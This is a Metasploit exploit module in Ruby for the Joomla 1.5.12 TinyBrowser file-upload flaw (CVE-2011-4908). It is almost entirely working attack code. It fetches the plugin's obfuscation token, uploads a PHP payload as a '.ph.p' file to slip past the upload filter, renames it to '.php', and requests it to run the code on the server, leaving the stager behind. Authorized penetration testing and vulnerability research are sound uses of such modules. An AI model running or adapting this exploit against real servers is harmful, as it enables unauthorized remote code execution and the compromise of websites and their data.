##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
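class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Location of the vulnerable TinyBrowser plugin, relative to the Joomla
  # root given by the URI option.
  TINYBROWSER_PATH = 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser'.freeze

  # Web-reachable directory TinyBrowser is asked to store the upload in; the
  # stager is executed from here, so it has to be served by the web server.
  UPLOAD_DIRECTORY = '/images/stories/'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Joomla 1.5.12 TinyBrowser File Upload Code Execution',
        'Description' => %q{
          This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
          This plugin is not secured in version 1.5.12 of joomla and allows the upload
          of files on the remote server.
          By renaming the uploaded file this vulnerability can be used to upload/execute
          code on the affected system.
        },
        'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2011-4908'],
          ['OSVDB', '64578'],
          ['EDB', '9296'],
          ['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
        ],
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Compat' =>
            {
              'ConnectionType' => 'find',
            },
          'Space' => 1024,
        },
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [[ 'Automatic', {}]],
        'DisclosureDate' => '2009-07-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          # The uploaded .php stager is never removed by this module, and every
          # step is an HTTP request the target web server will record.
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('URI', [true, "Joomla directory path", "/"]),
      ]
    )
  end

  # Probe for the TinyBrowser upload page.
  #
  # @return [Exploit::CheckCode] Appears when upload.php serves the flash
  #   uploader marker, Unknown when the target did not answer at all (the
  #   original reported Safe here, which hid connectivity problems), else Safe
  def check
    res = send_request_raw({ 'uri' => "#{plugin_uri}/upload.php?type=file&folder=" }, 25)
    return Exploit::CheckCode::Unknown unless res
    return Exploit::CheckCode::Appears if res.body =~ /flexupload.swf/

    Exploit::CheckCode::Safe
  end

  # Scrape the "obfuscate" token that upload_file.php expects; upload.php embeds
  # it in its uploader JavaScript as `"obfus", "<token>"`.
  #
  # @return [String, nil] the token, or nil if the page could not be fetched
  #   or does not contain it
  def retrieve_obfuscation
    res = send_request_raw({ 'uri' => "#{plugin_uri}/upload.php?type=file&folder=" }, 25)
    return nil unless res && res.body =~ /"obfus", "(\w+)"\)/

    Regexp.last_match(1)
  end

  # Upload the PHP payload as <random>.ph.p, finalize the upload, rename it to
  # <random>.php via edit.php and request it once to trigger execution.
  #
  # Each step is a hard prerequisite for the next, so a failed step aborts with
  # fail_with instead of continuing to request a file that does not exist.
  # The stager is left on disk afterwards (see Notes).
  def exploit
    obfuscation_code = retrieve_obfuscation
    unless obfuscation_code
      fail_with(Failure::UnexpectedReply, 'Error retrieving obfuscation code!')
    end
    print_good("Successfully retrieved obfuscation code: #{obfuscation_code}")

    cmdscript = rand_text_alpha_lower(20)
    cmd_php = "<?php #{payload.encoded}?>"

    upload_stager(obfuscation_code, cmdscript, cmd_php)
    finalize_upload(cmdscript)
    rename_stager(cmdscript)

    # Finally call the payload
    print_status("Calling payload: #{cmdscript}.php")
    send_request_raw({
      'uri' => normalize_uri(datastore['URI'], UPLOAD_DIRECTORY, "#{cmdscript}.php")
    }, 25)
  end

  private

  # Base URI of the TinyBrowser plugin under the configured Joomla root, with
  # no trailing slash so callers can append "/<script>.php".
  def plugin_uri
    normalize_uri(datastore['URI'], TINYBROWSER_PATH)
  end

  # POST the stager to upload_file.php as a multipart form. The ".ph.p"
  # extension is what gets past the upload filter; the rename step turns it
  # into ".php". Aborts the run if the success marker is not returned.
  def upload_stager(obfuscation_code, cmdscript, cmd_php)
    staged_name = "#{cmdscript}.ph.p"
    boundary = rand_text_alphanumeric(6)

    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
    data << "#{staged_name}\r\n--#{boundary}"
    data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{staged_name}\"\r\n"
    data << "Content-Type: application/octet-stream\r\n\r\n"
    data << cmd_php
    data << "\r\n--#{boundary}--"

    res = send_request_raw({
      'uri' => "#{plugin_uri}/upload_file.php?folder=#{UPLOAD_DIRECTORY}&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
      'method' => 'POST',
      'data' => data,
      'headers' =>
        {
          # bytesize, not length: the header must count bytes on the wire
          'Content-Length' => data.bytesize,
          'Content-Type' => "multipart/form-data; boundary=#{boundary}",
        }
    }, 25)

    unless res && res.body =~ /File Upload Success/
      fail_with(Failure::UnexpectedReply, "Error uploading #{staged_name}")
    end
    print_good("Successfully Uploaded #{staged_name}")
  end

  # Complete the upload batch via upload_process.php. Per the original author's
  # note the file sits as "<name>.ph.p_" until this request is made; the
  # response carries nothing the module depends on, so it is not inspected.
  def finalize_upload(cmdscript)
    print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
    send_request_raw({
      'uri' => "#{plugin_uri}/upload_process.php?folder=#{UPLOAD_DIRECTORY}&type=file&feid=&filetotal=1"
    })
  end

  # Rename the staged file from .ph.p to .php through edit.php's rename action.
  # Aborts the run if the success marker is not returned.
  def rename_stager(cmdscript)
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => "#{plugin_uri}/edit.php?type=file&folder=",
        'vars_post' =>
          {
            'actionfile[0]' => "#{cmdscript}.ph.p",
            'renameext[0]' => 'p',
            'renamefile[0]' => "#{cmdscript}.ph",
            'sortby' => 'name',
            'sorttype' => 'asc',
            'showpage' => '0',
            'action' => 'rename',
            'commit' => '',
          }
      }, 10
    )

    unless res && res.body =~ /successfully renamed./
      fail_with(Failure::UnexpectedReply, "Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
    end
    print_status("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
  end
end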